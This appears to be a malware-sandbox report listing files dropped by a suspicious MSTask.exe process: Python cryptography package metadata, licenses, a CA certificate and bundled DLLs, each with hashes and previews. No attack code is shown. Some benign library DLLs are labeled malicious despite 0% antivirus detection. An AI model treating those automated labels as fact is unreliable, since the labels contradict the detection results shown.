                                                                                                                                                                                                  MD5:302B49C5F476C0AE35571430BB2E4AA0
                                                                                                                                                                                                  SHA1:35A7837A3F1B960807BF46B1C95EC22792262846
                                                                                                                                                                                                  SHA-256:CF9D37FA81407AFE11DCC0D70FE602561422AA2344708C324E4504DB8C6C5748
                                                                                                                                                                                                  SHA-512:1345AF52984B570B1FF223032575FEB36CDFB4F38E75E0BD3B998BC46E9C646F7AC5C583D23A70460219299B9C04875EF672BF5A0D614618731DF9B7A5637D0A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\INSTALLER

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Mn:M
                                                                                                                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:pip.

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\LICENSE

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):197
                                                                                                                                                                                                  Entropy (8bit):4.61968998873571
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                  MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                  SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                  SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                  SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\LICENSE.APACHE

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11360
                                                                                                                                                                                                  Entropy (8bit):4.426756947907149
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                  MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                  SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                  SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                  SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\LICENSE.BSD

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1532
                                                                                                                                                                                                  Entropy (8bit):5.058591167088024
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                  MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                  SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                  SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                  SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\METADATA

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5292
                                                                                                                                                                                                  Entropy (8bit):5.115440205505611
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:DxapqZink/QIHQIyzQIZQILuQIR8vtklGovxNx6sWwCvCCcTKvIrrg9BMM6VwDjz:sJnkoBs/sqLz8cTKvIrrUiM6VwDjyeWs
                                                                                                                                                                                                  MD5:137D13F917D94C83137A0FA5AE12B467
                                                                                                                                                                                                  SHA1:01E93402C225BF2A4EE59F9A06F8062CB5E4801E
                                                                                                                                                                                                  SHA-256:36738E6971D2F20DB78433185A0EF7912A48544AA6FF7006505A7DC785158859
                                                                                                                                                                                                  SHA-512:1B22CBC6E22FA5E2BD5CC4A370443A342D00E7DD53330A4000E9A680DE80262BCA7188764E3568944D01025188291602AC8C53C971630984FBD9FA7D75AAB124
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:Metadata-Version: 2.1..Name: cryptography..Version: 41.0.7..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\RECORD

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15168
                                                                                                                                                                                                  Entropy (8bit):5.546877465471185
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3XpaU/ZfaigianJN5/6T2UbycOx6uvnbLEG:3MUxfzhctJEG
                                                                                                                                                                                                  MD5:5E9FE04D9B7C72A0CEAB82279DC041A7
                                                                                                                                                                                                  SHA1:55BD916F8AA7A96C4749F573224AEDEF19D19AD4
                                                                                                                                                                                                  SHA-256:9C715FEEF321EE70D54257485FAE3461B5A848032B1A13CDE408B68633DC2811
                                                                                                                                                                                                  SHA-512:69B51C02C51D0881CBD8BF8A1D08F902EE4ED21CF26055EA09A9AC98BE26AA1F80A90D3D6DCA6090AE248C7D41FAA0BF47F794BBFB2A65A36811B2840948F710
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:cryptography-41.0.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-41.0.7.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-41.0.7.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-41.0.7.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-41.0.7.dist-info/METADATA,sha256=NnOOaXHS8g23hDMYWg73kSpIVEqm_3AGUFp9x4UViFk,5292..cryptography-41.0.7.dist-info/RECORD,,..cryptography-41.0.7.dist-info/WHEEL,sha256=-EX5DQzNGQEoyL99Q-0P0-D-CXbfqafenaAeiSQ_Ufk,100..cryptography-41.0.7.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=uPXMbbcptt7EzZ_jllGRx0pVdMn-NBsAM4L74hOv-b0,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/__about__.cpython-38.pyc,,..cryptography/__pycache__/__init__.cpython-38.pyc,,..cryptography/__

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\WHEEL

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100
                                                                                                                                                                                                  Entropy (8bit):5.0203365408149025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKc/SKQLn:RtBMwlVCxWKxDQLn
                                                                                                                                                                                                  MD5:4B432A99682DE414B29A683A3546B69F
                                                                                                                                                                                                  SHA1:F59C5016889EE5E9F62D09B22AEFBC2211A56C93
                                                                                                                                                                                                  SHA-256:F845F90D0CCD190128C8BF7D43ED0FD3E0FE0976DFA9A7DE9DA01E89243F51F9
                                                                                                                                                                                                  SHA-512:CBBF10E19B6F4072C416EA95D7AE259B9C5A1B89068B7B6660B7C637D6F2437AEA8D8202A2E26A0BEC36DAECD8BBB6B59016FC2DDEB13C545F0868B3E15479CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp37-abi3-win_amd64..

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography-41.0.7.dist-info\top_level.txt

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                  Entropy (8bit):3.2389012566026314
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:cOv:Nv
                                                                                                                                                                                                  MD5:E7274BD06FF93210298E7117D11EA631
                                                                                                                                                                                                  SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                                                                                                                                  SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                                                                                                                                  SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:cryptography.

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6673920
                                                                                                                                                                                                  Entropy (8bit):6.582002531606852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                  MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                  SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                  SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                  SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......QN.../.../.../...W(../......./......./......./......./...R.../...Z.../..^W.../.../...-../...",......./.../.../......./......./..Rich./..........PE..d...M7ee.........." ...&..M..........L...................................... f...........`......................................... .a.p.....a.|............Pb..............Pe.p...p.[.T.....................[.(...0.[.@............0M..............................text.....M.......M................. ..`.rdata.......0M.......M.............@..@.data........0a.......a.............@....pdata.......Pb.......b.............@..@.reloc..p....Pe.......e.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\libcrypto-1_1.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3381792
                                                                                                                                                                                                  Entropy (8bit):6.094908167946797
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                  MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                  SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                  SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                  SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\libffi-7.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32792
                                                                                                                                                                                                  Entropy (8bit):6.372276555451265
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                  MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                  SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                  SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                  SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\libssl-1_1.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):686112
                                                                                                                                                                                                  Entropy (8bit):5.528877787845415
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:3L6MSpHovlo4qL7a3ZV9CblMOoAXToRtrBZf3Fb85BO9K9pB3TLPDdOU2lvz8:wIAL7a3heSFZf2Pq63HJOU2lvz
                                                                                                                                                                                                  MD5:FE1F3632AF98E7B7A2799E3973BA03CF
                                                                                                                                                                                                  SHA1:353C7382E2DE3CCDD2A4911E9E158E7C78648496
                                                                                                                                                                                                  SHA-256:1CE7BA99E817C1C2D71BC88A1BDD6FCAD82AA5C3E519B91EBD56C96F22E3543B
                                                                                                                                                                                                  SHA-512:A0123DFE324D3EBF68A44AFAFCA7C6F33D918716F29B063C72C4A8BD2006B81FAEA6848F4F2423778D57296D7BF4F99A3638FC87B37520F0DCBEEFA3A2343DE0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8<..YRT.YRT.YRT.!.T.YRT.1SU.YRT.?SU.YRT.1WU.YRT.1VU.YRT.1QU.YRTf0SU.YRT.YST.XRTf0VU.YRTf0RU.YRTf0.T.YRTf0PU.YRTRich.YRT................PE..d....k.].........." ..... ...D.......$...............................................2....`..............................................N...%..........s........K...^.. .......D.......8........................... ................................................text...7........ .................. ..`.rdata...#...0...$...$..............@..@.data...1M...`...D...H..............@....pdata...S.......T..................@..@.idata..rV.......X..................@..@.00cfg.......p.......8..............@..@.rsrc...s............:..............@..@.reloc..!............B..............@..B........................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\psutil\_psutil_windows.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):67072
                                                                                                                                                                                                  Entropy (8bit):5.90551713971002
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ZhseNxkc7Xva0Y420G1UD+dS4gBeLmRy:Z1kcbi0Y42bUD+dS4oeiRy
                                                                                                                                                                                                  MD5:01F9D30DD889A3519E3CA93FE6EFEE70
                                                                                                                                                                                                  SHA1:EBF55ADBD8CD938C4C11D076203A3E54D995AEFF
                                                                                                                                                                                                  SHA-256:A66444A08A8B9CEAFA05DAEFEB32AA1E65C8009A3C480599F648FA52A20AFB7D
                                                                                                                                                                                                  SHA-512:76FED302D62BB38A39E0BF6C9038730E83B6AFFFA2F36E7A62B85770D4847EA6C688098061945509A1FDB799FB7F5C88699F94E7DA1934F88A9C3B6A433EE9EF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`T..$5..$5..$5..-M3..5..v@..&5..v@..(5..v@..,5..v@.. 5...k..&5..oM..55..$5...5...@..45...@..%5...@_.%5...@..%5..Rich$5..........................PE..d.....~e.........." .........h..............................................@............`.........................................P...`.......@.... .......................0..(.......................................8............................................text............................... ..`.rdata..|I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\python3.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58952
                                                                                                                                                                                                  Entropy (8bit):5.849953914987793
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:oS99q+0o22ByfbEap+VCBQ53gUiT5pLFdBk4/yFi1nuVwWBjChtFyrUdmd9RSxDD:79xiEAnUvdK1IGV0QyrI
                                                                                                                                                                                                  MD5:7ACEC875D5672E7AA148B8C40DF9AA49
                                                                                                                                                                                                  SHA1:96B8CFABE0CFA3DF32995919AC77CFDEEC26F1F2
                                                                                                                                                                                                  SHA-256:D96858E433F45917499DBF5E052E56F079FF9AE259FD3CAA025C3B1DAF852891
                                                                                                                                                                                                  SHA-512:1208DA62FE82B779EC822AD702F9CA4321B34EE590C28E10EFE9A2DB6D582BFDCAE01AB2431C1A98714EF0C60434D64C58F3DB31BF5886EFBB943ADC70D6E975
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............d..d..d.N.l..d.N.d..d.N..d.N.f..d.Rich.d.........PE..d.....].........." .....................................................................`.........................................` ..@...............................H............ ..T............................................................................text............................... ..`.rdata..d.... ......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\python38.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4183112
                                                                                                                                                                                                  Entropy (8bit):6.420172758698049
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                  MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                  SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                  SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                  SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\Temp\_MEI81722\select.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Tasks\MSTask.exe
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26696
                                                                                                                                                                                                  Entropy (8bit):6.101296746249305
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                  MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                  SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                  SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
